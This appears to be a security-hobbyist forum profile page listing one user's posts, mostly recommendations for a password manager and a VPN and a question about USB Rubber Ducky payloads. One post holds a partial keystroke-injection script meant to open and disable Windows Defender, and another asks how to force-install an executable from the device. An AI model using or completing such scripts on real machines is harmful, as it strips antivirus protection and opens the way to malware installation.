Jump to content

Hobbes_

Active Members
  • Posts

    9
  • Joined

  • Last visited

Recent Profile Visitors

995 profile views

Hobbes_'s Achievements

Newbie

Newbie (1/14)

  1. Im a big fan of Keepass. Very lightweight, easy to use, and very reliable.
  2. PIA all the way. Very VERY well priced, and offers very reliable speeds in an easy to use format. https://www.privateinternetaccess.com/
  3. Connect straight into your network, and see how far you can get using nmap, metasploit, etc. If you have kids in the house, see how easy it would be to social engineer them and then use that as a learning moment for them. Knowledge is power!
  4. Really? You would think they would make it persistent haha
  5. Hello all, I've put together a simple script that attempts to disable Windows Defender on Windows 8.1 (will update to 7 later). My only problem is that I have an issue where there is a check box titled "turn on this app" and when I tab over to it, there is no way for me to uncheck that selection. I hope that someone might either find a work around to my method or find a way to make it work. Thank you Disable Windows Defender: REM Author : Hobbes REM Description : Attempts to disable Windows Defender anti-virus. REM Note : Only tested on Windows 8.1 - Windows 7 compatibility unknown. REM ***[Initial Delay]*** DELAY 3000 REM ***[Navigate to Windows Defender]*** GUI r DELAY 250 STRING cmd ENTER DELAY 800 STRING start "" "C:\Program Files\Windows Defender\MSASCui.exe" ENTER DELAY 400 REM **[Disables Defender]*** TAB DELAY 80 TAB DELAY 80 RIGHTARROW DELAY 80 RIGHTARROW DELAY 80 RIGHTARROW DELAY 80 TAB DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 TAB
  6. I have heard a lot about the USB rubber ducky and I have just recently purchased one. I am waiting for it to come in the mail so I haven't had any time to play around with one yet. I have been thinking ahead with what I might want to do with my rubber ducky and I am wondering if there is a way that I can have an exe file on the micro sd and have the payload force install that file. I think I read somewhere that if I want a payload to interact with files on the SD I would need to use twin duck? How would I do that? Please make the explanation noob friendly!
×
×
  • Create New...